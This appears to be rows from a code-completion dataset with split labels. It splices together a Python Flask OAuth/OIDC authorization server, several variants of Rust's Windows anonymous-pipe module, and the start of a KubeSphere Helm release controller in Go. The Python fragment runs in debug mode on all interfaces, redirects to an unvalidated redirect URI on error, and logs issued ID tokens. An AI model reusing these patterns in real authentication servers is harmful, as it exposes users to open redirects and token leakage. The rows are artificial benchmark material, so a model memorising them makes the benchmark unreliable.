#{'iss': 'Authlib', 'sub': '123', ...}
#>>> print(claims.header)
#{'alg': 'RS256', 'typ': 'JWT'}
#>>> claims.validate()
# Save to NoSQL
# The access_token is stored in NoSQL; the resource server queries NoSQL,
# compares the access_token, and denies access if it does not match
access_token_data = {
'access_token': access_token,
'client_id': clientId,
'scope': code['scope'],
'user': get_userinfo(code['user'])
}
col_atoken.insert_one(access_token_data)
###
### Create the ID token
###
# Set the scope
cscope = None
if 'scope' in code:
cscope = code['scope']
app.logger.debug("toke_response")
token_response = {
'access_token': access_token,
'token_type': 'Bearer',
'scope': cscope
}
# If the scope contains openid and a user is set
work_scope = code['scope'].split(" ")
if ('openid' in work_scope ) and ('user' in code):
header = {
'typ': 'JWT',
'alg': 'RS256',
'kid': 'authserver'
}
#
# Set the user attributes from LDAP
#
app.logger.debug("mongo user = " + code['user'])
app.logger.debug("mongo client_id = " + code['client_id'])
for c in code:
app.logger.debug(c)
user_info = search_ldap(code['user'])
app.logger.debug("user_info = " + user_info['cn'][0])
#
# OIDC payload
# Reference: https://qiita.com/TakahikoKawasaki/items/8f0e422c7edd2d220e06
# https://openid.net/specs/openid-connect-core-1_0.html#StandardClaims
#
payload = {
'iss': cf.OAUTH_SERVER_URL, # URL of the authorization server
'sub': code['user'], # unique user UID
'aud': code['client_id'], # ID of the authorized application
'name': user_info['cn'][0], # user name
'iat': int(time.time()), # issued at (now)
'exp': int(time.time()) + 300 # expires in 5 minutes
}
# If the request contained a nonce, add it to the payload
if 'request' in code:
if 'nonce' in code['request']:
payload['nonce'] = code['request']['nonce']
# Generate the JWT
with open('key-private.pem', 'rb') as f:
prvkey = f.read()
id_token = jwt.encode(header, payload, prvkey)
app.logger.debug('Issued tokens for code ' + id_token.decode())
app.logger.debug('decoding id_token from bytes to a string')
token_response['id_token'] = id_token.decode()
app.logger.debug('decoded id_token from bytes to a string')
return token_response, 200
##
## MAIN
##
if __name__ == '__main__':
api = Api(app)
bx_port = os.getenv("PORT")
listen_port = int(bx_port if bx_port else 5000)
app.run(host='0.0.0.0', port=listen_port, debug=True)
| # クライアントIDの存在チェック
# The client ID (app ID) must be registered with the authorization server in advance
if check_client_id(query['client_id']) == False:
app.logger.debug('Unknown client = ' + query['client_id'])
resp = { 'error': 'Unknown client' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
# Check the redirect URI
# The redirect URI must also be registered with the authorization server in advance
if check_redirect(query['client_id'],query['redirect_uri']) == False:
app.logger.debug('Invalid redirect URI = ' + query['client_id'] + " " + query['redirect_uri'])
resp = { 'error': 'Invalid redirect URI' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
# Save to the DB so the next step can be matched against this request
requests[reqid] = qs.query
# Display the user authentication (login) form
return render_template('authorize.html',
client_id=query['client_id'],
redirect_uri=query['redirect_uri'],
state=query['state'],
reqid=reqid,scope=query['scope'])
#
# Receive the input from the authentication (login) form,
# check the user ID and password, and treat authentication as successful if they match
#
## Approve
@app.route('/approve', methods=['POST', 'GET'])
def authn():
## Run the authentication process
## Check that the query string exists; if not, respond with an error
## The query string contains:
## 1. client_id
## 2. redirect_uris
## 3. state
##
## Process only if the response type is code
## Check that the requested scope does not exceed what is allowed
#
# The user is authenticated here as well
#
# user: taken from the form
# scope: taken from the form
# client_id: taken from the query string
# Attach code and state to the query string and forward to the redirect URI
query_recv = urllib.parse.urlparse(request.url)
query = dict(urllib.parse.parse_qsl(query_recv.query))
# Retrieve the query string that was stored under the reqid key
# and remove the reqid entry from the dictionary
reqid = request.form['reqid']
query_sent = None
squery = {}
if reqid in requests:
query_sent = requests.pop(reqid)
squery = dict(urllib.parse.parse_qsl(query_sent))
else:
# If there is no entry for the submitted query-string ID, treat it as invalid and return an error
app.logger.debug('No matching authorization request [' + reqid + ']')
resp = { 'error': 'No matching authorization reque | identifier_body |
pipe.rs | // Copyright 2015 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
use os::windows::prelude::*;
use ffi::OsStr;
use io;
use mem;
use path::Path;
use ptr;
use rand::{self, Rng};
use slice;
use sys::c;
use sys::fs::{File, OpenOptions};
use sys::handle::Handle;
////////////////////////////////////////////////////////////////////////////////
// Anonymous pipes
////////////////////////////////////////////////////////////////////////////////
pub struct AnonPipe {
inner: Handle,
}
pub fn anon_pipe() -> io::Result<(AnonPipe, AnonPipe)> {
// Note that we specifically do *not* use `CreatePipe` here because
// unfortunately the anonymous pipes returned do not support overlapped
// operations.
//
// Instead, we create a "hopefully unique" name and create a named pipe
// which has overlapped operations enabled.
//
// Once we do this, we connect to it as usual via `CreateFileW`, and then we
// return those reader/writer halves.
unsafe {
let reader;
let mut name;
let mut tries = 0;
loop {
tries += 1;
let key: u64 = rand::thread_rng().gen();
name = format!(r"\\.\pipe\__rust_anonymous_pipe1__.{}.{}",
c::GetCurrentProcessId(),
key);
let wide_name = OsStr::new(&name)
.encode_wide()
.chain(Some(0))
.collect::<Vec<_>>();
let handle = c::CreateNamedPipeW(wide_name.as_ptr(),
c::PIPE_ACCESS_INBOUND |
c::FILE_FLAG_FIRST_PIPE_INSTANCE |
c::FILE_FLAG_OVERLAPPED,
c::PIPE_TYPE_BYTE |
c::PIPE_READMODE_BYTE |
c::PIPE_WAIT |
c::PIPE_REJECT_REMOTE_CLIENTS,
1,
4096,
4096,
0,
ptr::null_mut());
// We pass the FILE_FLAG_FIRST_PIPE_INSTANCE flag above, and we're
// also just doing a best effort at selecting a unique name. If
// ERROR_ACCESS_DENIED is returned then it could mean that we
// accidentally conflicted with an already existing pipe, so we try
// again.
//
// Don't try again too much though as this could also perhaps be a
// legit error.
if handle == c::INVALID_HANDLE_VALUE {
let err = io::Error::last_os_error();
if tries < 10 &&
err.raw_os_error() == Some(c::ERROR_ACCESS_DENIED as i32) {
continue
}
return Err(err)
}
reader = Handle::new(handle);
break
}
// Connect to the named pipe we just created in write-only mode (also
// overlapped for async I/O below).
let mut opts = OpenOptions::new();
opts.write(true);
opts.read(false);
opts.share_mode(0);
opts.attributes(c::FILE_FLAG_OVERLAPPED);
let writer = File::open(Path::new(&name), &opts)?;
let writer = AnonPipe { inner: writer.into_handle() };
Ok((AnonPipe { inner: reader }, writer))
}
}
impl AnonPipe {
pub fn handle(&self) -> &Handle { &self.inner }
pub fn into_handle(self) -> Handle { self.inner }
pub fn read(&self, buf: &mut [u8]) -> io::Result<usize> {
self.inner.read(buf)
}
pub fn read_to_end(&self, buf: &mut Vec<u8>) -> io::Result<usize> {
self.inner.read_to_end(buf)
}
pub fn write(&self, buf: &[u8]) -> io::Result<usize> {
self.inner.write(buf)
}
}
pub fn read2(p1: AnonPipe,
v1: &mut Vec<u8>,
p2: AnonPipe,
v2: &mut Vec<u8>) -> io::Result<()> {
let p1 = p1.into_handle();
let p2 = p2.into_handle();
let mut p1 = AsyncPipe::new(p1, v1)?;
let mut p2 = AsyncPipe::new(p2, v2)?;
let objs = [p1.event.raw(), p2.event.raw()];
// In a loop we wait for either pipe's scheduled read operation to complete.
// If the operation completes with 0 bytes, that means EOF was reached, in
// which case we just finish out the other pipe entirely.
//
// Note that overlapped I/O is in general super unsafe because we have to
// be careful to ensure that all pointers in play are valid for the entire
// duration of the I/O operation (where tons of operations can also fail).
// The destructor for `AsyncPipe` ends up taking care of most of this.
loop {
let res = unsafe {
c::WaitForMultipleObjects(2, objs.as_ptr(), c::FALSE, c::INFINITE)
};
if res == c::WAIT_OBJECT_0 {
if !p1.result()? || !p1.schedule_read()? {
return p2.finish()
}
} else if res == c::WAIT_OBJECT_0 + 1 {
if !p2.result()? || !p2.schedule_read()? {
return p1.finish()
}
} else {
return Err(io::Error::last_os_error())
}
}
}
struct AsyncPipe<'a> {
pipe: Handle,
event: Handle,
overlapped: Box<c::OVERLAPPED>, // needs a stable address
dst: &'a mut Vec<u8>,
state: State,
}
#[derive(PartialEq, Debug)]
enum State {
NotReading,
Reading,
Read(usize),
}
impl<'a> AsyncPipe<'a> {
fn new(pipe: Handle, dst: &'a mut Vec<u8>) -> io::Result<AsyncPipe<'a>> {
// Create an event which we'll use to coordinate our overlapped
// operations; this event will be used in WaitForMultipleObjects
// and passed as part of the OVERLAPPED handle.
//
// Note that we do a somewhat clever thing here by flagging the
// event as being manually reset and setting it initially to the
// signaled state. This means that we'll naturally fall through the
// WaitForMultipleObjects call above for pipes created initially,
// and the only time an event will go back to "unset" will be once an
// I/O operation is successfully scheduled (what we want).
let event = Handle::new_event(true, true)?;
let mut overlapped: Box<c::OVERLAPPED> = unsafe {
Box::new(mem::zeroed())
};
overlapped.hEvent = event.raw();
Ok(AsyncPipe {
pipe: pipe,
overlapped: overlapped,
event: event,
dst: dst,
state: State::NotReading,
})
}
/// Executes an overlapped read operation.
///
/// Must not currently be reading, and returns whether the pipe is currently
/// at EOF or not. If the pipe is not at EOF then `result()` must be called
/// to complete the read later on (may block), but if the pipe is at EOF
/// then `result()` should not be called as it will just block forever.
fn schedule_read(&mut self) -> io::Result<bool> {
assert_eq!(self.state, State::NotReading);
let amt = unsafe {
let slice = slice_to_end(self.dst);
self.pipe.read_overlapped(slice, &mut *self.overlapped)?
};
// If this read finished immediately then our overlapped event will
// remain signaled (it was signaled coming in here) and we'll progress
// down to the method below.
//
// Otherwise the I/O operation is scheduled and the system set our event
// to not signaled, so we flag ourselves into the reading state and move
// on.
self.state = match amt {
Some(0) => return Ok(false),
Some(amt) => State::Read(amt),
None => State::Reading,
};
Ok(true)
}
/// Wait for the result of the overlapped operation previously executed.
///
/// If a read is currently in flight, this blocks until it completes.
///
/// Return values:
///
/// * `true` - finished any pending read and the pipe is not at EOF (keep
/// going)
/// * `false` - finished any pending read and pipe is at EOF (stop issuing
/// reads)
fn | (&mut self) -> io::Result<bool> {
let amt = match self.state {
State::NotReading => return Ok(true),
State::Reading => {
self.pipe.overlapped_result(&mut *self.overlapped, true)?
}
State::Read(amt) => amt,
};
self.state = State::NotReading;
unsafe {
let len = self.dst.len();
self.dst.set_len(len + amt);
}
Ok(amt != 0)
}
/// Finishes out reading this pipe entirely.
///
/// Waits for any pending and scheduled read, then keeps scheduling further
/// reads until the pipe reaches EOF.
fn finish(&mut self) -> io::Result<()> {
while self.result()? && self.schedule_read()? {
// ...
}
Ok(())
}
}
impl<'a> Drop for AsyncPipe<'a> {
fn drop(&mut self) {
match self.state {
State::Reading => {}
_ => return,
}
// If we have a pending read operation, then we have to make sure that
// it's *done* before we actually drop this type. The kernel requires
// that the `OVERLAPPED` and buffer pointers are valid for the entire
// I/O operation.
//
// To do that, we call `CancelIo` to cancel any pending operation, and
// if that succeeds we wait for the overlapped result.
//
// If anything here fails, there's not really much we can do, so we leak
// the buffer/OVERLAPPED pointers to ensure we're at least memory safe.
if self.pipe.cancel_io().is_err() || self.result().is_err() {
let buf = mem::replace(self.dst, Vec::new());
let overlapped = Box::new(unsafe { mem::zeroed() });
let overlapped = mem::replace(&mut self.overlapped, overlapped);
mem::forget((buf, overlapped));
}
}
}
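// Returns the vector's spare (uninitialized) capacity as a mutable slice,
// growing the vector first if there is none, so an overlapped read can
// write directly into it before `set_len` commits the bytes.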
unsafe fn slice_to_end(v: &mut Vec<u8>) -> &mut [u8] {
if v.capacity() == 0 {
v.reserve(16);
}
if v.capacity() == v.len() {
v.reserve(1);
}
slice::from_raw_parts_mut(v.as_mut_ptr().offset(v.len() as isize),
v.capacity() - v.len())
}
| result | identifier_name |
pipe.rs | // Copyright 2015 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
use os::windows::prelude::*;
use ffi::OsStr;
use io;
use mem;
use path::Path;
use ptr;
use rand::{self, Rng};
use slice;
use sys::c;
use sys::fs::{File, OpenOptions};
use sys::handle::Handle;
////////////////////////////////////////////////////////////////////////////////
// Anonymous pipes
////////////////////////////////////////////////////////////////////////////////
pub struct AnonPipe {
inner: Handle,
}
pub fn anon_pipe() -> io::Result<(AnonPipe, AnonPipe)> {
// Note that we specifically do *not* use `CreatePipe` here because
// unfortunately the anonymous pipes returned do not support overlapped
// operations.
//
// Instead, we create a "hopefully unique" name and create a named pipe
// which has overlapped operations enabled.
//
// Once we do this, we connect to it as usual via `CreateFileW`, and then we
// return those reader/writer halves.
unsafe {
let reader;
let mut name;
let mut tries = 0;
loop {
tries += 1;
let key: u64 = rand::thread_rng().gen();
name = format!(r"\\.\pipe\__rust_anonymous_pipe1__.{}.{}",
c::GetCurrentProcessId(),
key);
let wide_name = OsStr::new(&name)
.encode_wide()
.chain(Some(0))
.collect::<Vec<_>>();
let handle = c::CreateNamedPipeW(wide_name.as_ptr(),
c::PIPE_ACCESS_INBOUND |
c::FILE_FLAG_FIRST_PIPE_INSTANCE |
c::FILE_FLAG_OVERLAPPED,
c::PIPE_TYPE_BYTE |
c::PIPE_READMODE_BYTE |
c::PIPE_WAIT |
c::PIPE_REJECT_REMOTE_CLIENTS,
1,
4096,
4096,
0,
ptr::null_mut());
// We pass the FILE_FLAG_FIRST_PIPE_INSTANCE flag above, and we're
// also just doing a best effort at selecting a unique name. If
// ERROR_ACCESS_DENIED is returned then it could mean that we
// accidentally conflicted with an already existing pipe, so we try
// again.
//
// Don't try again too much though as this could also perhaps be a
// legit error.
if handle == c::INVALID_HANDLE_VALUE {
let err = io::Error::last_os_error();
if tries < 10 &&
err.raw_os_error() == Some(c::ERROR_ACCESS_DENIED as i32) {
continue
}
return Err(err)
}
reader = Handle::new(handle);
break
}
// Connect to the named pipe we just created in write-only mode (also
// overlapped for async I/O below).
let mut opts = OpenOptions::new();
opts.write(true);
opts.read(false);
opts.share_mode(0);
opts.attributes(c::FILE_FLAG_OVERLAPPED);
let writer = File::open(Path::new(&name), &opts)?;
let writer = AnonPipe { inner: writer.into_handle() };
Ok((AnonPipe { inner: reader }, writer))
}
}
impl AnonPipe {
pub fn handle(&self) -> &Handle { &self.inner }
pub fn into_handle(self) -> Handle { self.inner }
pub fn read(&self, buf: &mut [u8]) -> io::Result<usize> {
self.inner.read(buf)
}
pub fn read_to_end(&self, buf: &mut Vec<u8>) -> io::Result<usize> {
self.inner.read_to_end(buf)
}
pub fn write(&self, buf: &[u8]) -> io::Result<usize> {
self.inner.write(buf)
}
}
pub fn read2(p1: AnonPipe,
v1: &mut Vec<u8>,
p2: AnonPipe,
v2: &mut Vec<u8>) -> io::Result<()> {
let p1 = p1.into_handle();
let p2 = p2.into_handle();
let mut p1 = AsyncPipe::new(p1, v1)?;
let mut p2 = AsyncPipe::new(p2, v2)?;
let objs = [p1.event.raw(), p2.event.raw()];
// In a loop we wait for either pipe's scheduled read operation to complete.
// If the operation completes with 0 bytes, that means EOF was reached, in
// which case we just finish out the other pipe entirely.
//
// Note that overlapped I/O is in general super unsafe because we have to
// be careful to ensure that all pointers in play are valid for the entire
// duration of the I/O operation (where tons of operations can also fail).
// The destructor for `AsyncPipe` ends up taking care of most of this.
loop {
let res = unsafe {
c::WaitForMultipleObjects(2, objs.as_ptr(), c::FALSE, c::INFINITE)
};
if res == c::WAIT_OBJECT_0 {
if !p1.result()? || !p1.schedule_read()? {
return p2.finish()
}
} else if res == c::WAIT_OBJECT_0 + 1 {
if !p2.result()? || !p2.schedule_read()? {
return p1.finish()
}
} else {
return Err(io::Error::last_os_error())
}
}
}
struct AsyncPipe<'a> {
pipe: Handle,
event: Handle,
overlapped: Box<c::OVERLAPPED>, // needs a stable address
dst: &'a mut Vec<u8>,
state: State,
}
#[derive(PartialEq, Debug)]
enum State {
NotReading,
Reading,
Read(usize),
}
impl<'a> AsyncPipe<'a> {
fn new(pipe: Handle, dst: &'a mut Vec<u8>) -> io::Result<AsyncPipe<'a>> {
// Create an event which we'll use to coordinate our overlapped
// operations; this event will be used in WaitForMultipleObjects
// and passed as part of the OVERLAPPED handle.
//
// Note that we do a somewhat clever thing here by flagging the
// event as being manually reset and setting it initially to the
// signaled state. This means that we'll naturally fall through the
// WaitForMultipleObjects call above for pipes created initially,
// and the only time an event will go back to "unset" will be once an
// I/O operation is successfully scheduled (what we want).
let event = Handle::new_event(true, true)?;
let mut overlapped: Box<c::OVERLAPPED> = unsafe {
Box::new(mem::zeroed())
};
overlapped.hEvent = event.raw();
Ok(AsyncPipe {
pipe: pipe,
overlapped: overlapped,
event: event,
dst: dst,
state: State::NotReading,
})
}
/// Executes an overlapped read operation.
///
/// Must not currently be reading, and returns whether the pipe is currently
/// at EOF or not. If the pipe is not at EOF then `result()` must be called
/// to complete the read later on (may block), but if the pipe is at EOF
/// then `result()` should not be called as it will just block forever.
fn schedule_read(&mut self) -> io::Result<bool> {
assert_eq!(self.state, State::NotReading);
let amt = unsafe {
let slice = slice_to_end(self.dst);
self.pipe.read_overlapped(slice, &mut *self.overlapped)?
};
// If this read finished immediately then our overlapped event will
// remain signaled (it was signaled coming in here) and we'll progress
// down to the method below.
//
// Otherwise the I/O operation is scheduled and the system set our event
// to not signaled, so we flag ourselves into the reading state and move
// on.
self.state = match amt {
Some(0) => return Ok(false),
Some(amt) => State::Read(amt),
None => State::Reading,
};
Ok(true)
}
/// Wait for the result of the overlapped operation previously executed.
///
/// If a read is currently in flight, this blocks until it completes.
///
/// Return values:
///
/// * `true` - finished any pending read and the pipe is not at EOF (keep
/// going)
/// * `false` - finished any pending read and pipe is at EOF (stop issuing
/// reads)
fn result(&mut self) -> io::Result<bool> {
let amt = match self.state {
State::NotReading => return Ok(true),
State::Reading => {
self.pipe.overlapped_result(&mut *self.overlapped, true)?
}
State::Read(amt) => amt,
};
self.state = State::NotReading;
unsafe {
let len = self.dst.len();
self.dst.set_len(len + amt);
}
Ok(amt != 0)
}
/// Finishes out reading this pipe entirely.
///
/// Waits for any pending and scheduled read, then keeps scheduling further
/// reads until the pipe reaches EOF.
fn finish(&mut self) -> io::Result<()> { | }
}
impl<'a> Drop for AsyncPipe<'a> {
fn drop(&mut self) {
match self.state {
State::Reading => {}
_ => return,
}
// If we have a pending read operation, then we have to make sure that
// it's *done* before we actually drop this type. The kernel requires
// that the `OVERLAPPED` and buffer pointers are valid for the entire
// I/O operation.
//
// To do that, we call `CancelIo` to cancel any pending operation, and
// if that succeeds we wait for the overlapped result.
//
// If anything here fails, there's not really much we can do, so we leak
// the buffer/OVERLAPPED pointers to ensure we're at least memory safe.
if self.pipe.cancel_io().is_err() || self.result().is_err() {
let buf = mem::replace(self.dst, Vec::new());
let overlapped = Box::new(unsafe { mem::zeroed() });
let overlapped = mem::replace(&mut self.overlapped, overlapped);
mem::forget((buf, overlapped));
}
}
}
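// Returns the vector's spare (uninitialized) capacity as a mutable slice,
// growing the vector first if there is none, so an overlapped read can
// write directly into it before `set_len` commits the bytes.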
unsafe fn slice_to_end(v: &mut Vec<u8>) -> &mut [u8] {
if v.capacity() == 0 {
v.reserve(16);
}
if v.capacity() == v.len() {
v.reserve(1);
}
slice::from_raw_parts_mut(v.as_mut_ptr().offset(v.len() as isize),
v.capacity() - v.len())
} | while self.result()? && self.schedule_read()? {
// ...
}
Ok(()) | random_line_split |
pipe.rs | // Copyright 2015 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
use os::windows::prelude::*;
use ffi::OsStr;
use io;
use mem;
use path::Path;
use ptr;
use rand::{self, Rng};
use slice;
use sys::c;
use sys::fs::{File, OpenOptions};
use sys::handle::Handle;
////////////////////////////////////////////////////////////////////////////////
// Anonymous pipes
////////////////////////////////////////////////////////////////////////////////
pub struct AnonPipe {
inner: Handle,
}
pub fn anon_pipe() -> io::Result<(AnonPipe, AnonPipe)> {
// Note that we specifically do *not* use `CreatePipe` here because
// unfortunately the anonymous pipes returned do not support overlapped
// operations.
//
// Instead, we create a "hopefully unique" name and create a named pipe
// which has overlapped operations enabled.
//
// Once we do this, we connect do it as usual via `CreateFileW`, and then we
// return those reader/writer halves.
unsafe {
let reader;
let mut name;
let mut tries = 0;
loop {
tries += 1;
let key: u64 = rand::thread_rng().gen();
name = format!(r"\\.\pipe\__rust_anonymous_pipe1__.{}.{}",
c::GetCurrentProcessId(),
key);
let wide_name = OsStr::new(&name)
.encode_wide()
.chain(Some(0))
.collect::<Vec<_>>();
let handle = c::CreateNamedPipeW(wide_name.as_ptr(),
c::PIPE_ACCESS_INBOUND |
c::FILE_FLAG_FIRST_PIPE_INSTANCE |
c::FILE_FLAG_OVERLAPPED,
c::PIPE_TYPE_BYTE |
c::PIPE_READMODE_BYTE |
c::PIPE_WAIT |
c::PIPE_REJECT_REMOTE_CLIENTS,
1,
4096,
4096,
0,
ptr::null_mut());
// We pass the FILE_FLAG_FIRST_PIPE_INSTANCE flag above, and we're
// also just doing a best effort at selecting a unique name. If
// ERROR_ACCESS_DENIED is returned then it could mean that we
// accidentally conflicted with an already existing pipe, so we try
// again.
//
// Don't try again too much though as this could also perhaps be a
// legit error.
if handle == c::INVALID_HANDLE_VALUE {
let err = io::Error::last_os_error();
if tries < 10 &&
err.raw_os_error() == Some(c::ERROR_ACCESS_DENIED as i32) {
continue
}
return Err(err)
}
reader = Handle::new(handle);
break
}
// Connect to the named pipe we just created in write-only mode (also
// overlapped for async I/O below).
let mut opts = OpenOptions::new();
opts.write(true);
opts.read(false);
opts.share_mode(0);
opts.attributes(c::FILE_FLAG_OVERLAPPED);
let writer = File::open(Path::new(&name), &opts)?;
let writer = AnonPipe { inner: writer.into_handle() };
Ok((AnonPipe { inner: reader }, writer))
}
}
impl AnonPipe {
pub fn handle(&self) -> &Handle |
pub fn into_handle(self) -> Handle { self.inner }
pub fn read(&self, buf: &mut [u8]) -> io::Result<usize> {
self.inner.read(buf)
}
pub fn read_to_end(&self, buf: &mut Vec<u8>) -> io::Result<usize> {
self.inner.read_to_end(buf)
}
pub fn write(&self, buf: &[u8]) -> io::Result<usize> {
self.inner.write(buf)
}
}
pub fn read2(p1: AnonPipe,
v1: &mut Vec<u8>,
p2: AnonPipe,
v2: &mut Vec<u8>) -> io::Result<()> {
let p1 = p1.into_handle();
let p2 = p2.into_handle();
let mut p1 = AsyncPipe::new(p1, v1)?;
let mut p2 = AsyncPipe::new(p2, v2)?;
let objs = [p1.event.raw(), p2.event.raw()];
// In a loop we wait for either pipe's scheduled read operation to complete.
// If the operation completes with 0 bytes, that means EOF was reached, in
// which case we just finish out the other pipe entirely.
//
// Note that overlapped I/O is in general super unsafe because we have to
// be careful to ensure that all pointers in play are valid for the entire
// duration of the I/O operation (where tons of operations can also fail).
// The destructor for `AsyncPipe` ends up taking care of most of this.
loop {
let res = unsafe {
c::WaitForMultipleObjects(2, objs.as_ptr(), c::FALSE, c::INFINITE)
};
if res == c::WAIT_OBJECT_0 {
if !p1.result()? || !p1.schedule_read()? {
return p2.finish()
}
} else if res == c::WAIT_OBJECT_0 + 1 {
if !p2.result()? || !p2.schedule_read()? {
return p1.finish()
}
} else {
return Err(io::Error::last_os_error())
}
}
}
struct AsyncPipe<'a> {
pipe: Handle,
event: Handle,
overlapped: Box<c::OVERLAPPED>, // needs a stable address
dst: &'a mut Vec<u8>,
state: State,
}
#[derive(PartialEq, Debug)]
enum State {
NotReading,
Reading,
Read(usize),
}
impl<'a> AsyncPipe<'a> {
fn new(pipe: Handle, dst: &'a mut Vec<u8>) -> io::Result<AsyncPipe<'a>> {
// Create an event which we'll use to coordinate our overlapped
// operations; this event will be used in WaitForMultipleObjects
// and passed as part of the OVERLAPPED handle.
//
// Note that we do a somewhat clever thing here by flagging the
// event as being manually reset and setting it initially to the
// signaled state. This means that we'll naturally fall through the
// WaitForMultipleObjects call above for pipes created initially,
// and the only time an event will go back to "unset" will be once an
// I/O operation is successfully scheduled (what we want).
let event = Handle::new_event(true, true)?;
let mut overlapped: Box<c::OVERLAPPED> = unsafe {
Box::new(mem::zeroed())
};
overlapped.hEvent = event.raw();
Ok(AsyncPipe {
pipe: pipe,
overlapped: overlapped,
event: event,
dst: dst,
state: State::NotReading,
})
}
/// Executes an overlapped read operation.
///
/// Must not currently be reading, and returns whether the pipe is currently
/// at EOF or not. If the pipe is not at EOF then `result()` must be called
/// to complete the read later on (may block), but if the pipe is at EOF
/// then `result()` should not be called as it will just block forever.
fn schedule_read(&mut self) -> io::Result<bool> {
assert_eq!(self.state, State::NotReading);
let amt = unsafe {
let slice = slice_to_end(self.dst);
self.pipe.read_overlapped(slice, &mut *self.overlapped)?
};
// If this read finished immediately then our overlapped event will
// remain signaled (it was signaled coming in here) and we'll progress
// down to the method below.
//
// Otherwise the I/O operation is scheduled and the system set our event
// to not signaled, so we flag ourselves into the reading state and move
// on.
self.state = match amt {
Some(0) => return Ok(false),
Some(amt) => State::Read(amt),
None => State::Reading,
};
Ok(true)
}
/// Wait for the result of the overlapped operation previously executed.
///
/// If a read is currently in flight, this blocks until it completes.
///
/// Return values:
///
/// * `true` - finished any pending read and the pipe is not at EOF (keep
/// going)
/// * `false` - finished any pending read and pipe is at EOF (stop issuing
/// reads)
fn result(&mut self) -> io::Result<bool> {
let amt = match self.state {
State::NotReading => return Ok(true),
State::Reading => {
self.pipe.overlapped_result(&mut *self.overlapped, true)?
}
State::Read(amt) => amt,
};
self.state = State::NotReading;
unsafe {
let len = self.dst.len();
self.dst.set_len(len + amt);
}
Ok(amt != 0)
}
/// Finishes out reading this pipe entirely.
///
/// Waits for any pending and schedule read, and then calls `read_to_end`
/// if necessary to read all the remaining information.
fn finish(&mut self) -> io::Result<()> {
while self.result()? && self.schedule_read()? {
// ...
}
Ok(())
}
}
impl<'a> Drop for AsyncPipe<'a> {
fn drop(&mut self) {
match self.state {
State::Reading => {}
_ => return,
}
// If we have a pending read operation, then we have to make sure that
// it's *done* before we actually drop this type. The kernel requires
// that the `OVERLAPPED` and buffer pointers are valid for the entire
// I/O operation.
//
// To do that, we call `CancelIo` to cancel any pending operation, and
// if that succeeds we wait for the overlapped result.
//
// If anything here fails, there's not really much we can do, so we leak
// the buffer/OVERLAPPED pointers to ensure we're at least memory safe.
if self.pipe.cancel_io().is_err() || self.result().is_err() {
let buf = mem::replace(self.dst, Vec::new());
let overlapped = Box::new(unsafe { mem::zeroed() });
let overlapped = mem::replace(&mut self.overlapped, overlapped);
mem::forget((buf, overlapped));
}
}
}
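// Returns the vector's spare (uninitialized) capacity as a mutable slice,
// growing the vector first if there is none, so an overlapped read can
// write directly into it before `set_len` commits the bytes.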
unsafe fn slice_to_end(v: &mut Vec<u8>) -> &mut [u8] {
if v.capacity() == 0 {
v.reserve(16);
}
if v.capacity() == v.len() {
v.reserve(1);
}
slice::from_raw_parts_mut(v.as_mut_ptr().offset(v.len() as isize),
v.capacity() - v.len())
}
| { &self.inner } | identifier_body |
helm_release_controller.go | /*
Copyright 2019 The KubeSphere Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package helmrelease
import (
"context"
"errors"
apierrors "k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/client-go/tools/cache"
"k8s.io/client-go/tools/record"
"k8s.io/klog"
"kubesphere.io/kubesphere/pkg/apis/application/v1alpha1"
clusterv1alpha1 "kubesphere.io/kubesphere/pkg/apis/cluster/v1alpha1"
"kubesphere.io/kubesphere/pkg/client/informers/externalversions"
"kubesphere.io/kubesphere/pkg/constants"
"kubesphere.io/kubesphere/pkg/simple/client/openpitrix/helmwrapper"
"kubesphere.io/kubesphere/pkg/simple/client/s3"
"kubesphere.io/kubesphere/pkg/utils/clusterclient"
"kubesphere.io/kubesphere/pkg/utils/sliceutil"
"kubesphere.io/kubesphere/pkg/utils/stringutils"
"math"
ctrl "sigs.k8s.io/controller-runtime"
"sigs.k8s.io/controller-runtime/pkg/client"
"sigs.k8s.io/controller-runtime/pkg/reconcile"
"time"
)
const (
HelmReleaseFinalizer = "helmrelease.application.kubesphere.io"
)
var (
ErrGetRepoFailed = errors.New("get repo failed")
ErrGetAppFailed = errors.New("get app failed")
ErrAppVersionDataIsEmpty = errors.New("app version data is empty")
ErrGetAppVersionFailed = errors.New("get app version failed")
ErrLoadChartFailed = errors.New("load chart failed")
ErrS3Config = errors.New("invalid s3 config")
ErrLoadChartFromStorageFailed = errors.New("load chart from storage failed")
)
var _ reconcile.Reconciler = &ReconcileHelmRelease{}
// ReconcileHelmRelease reconciles a HelmRelease object
type ReconcileHelmRelease struct {
StorageClient s3.Interface
KsFactory externalversions.SharedInformerFactory
client.Client
recorder record.EventRecorder
// mock helm install && uninstall
helmMock bool
informer cache.SharedIndexInformer
clusterClients clusterclient.ClusterClients
MultiClusterEnable bool
}
//
// <==>upgrading===================
// | \
// creating===>active=====>deleting=>deleted |
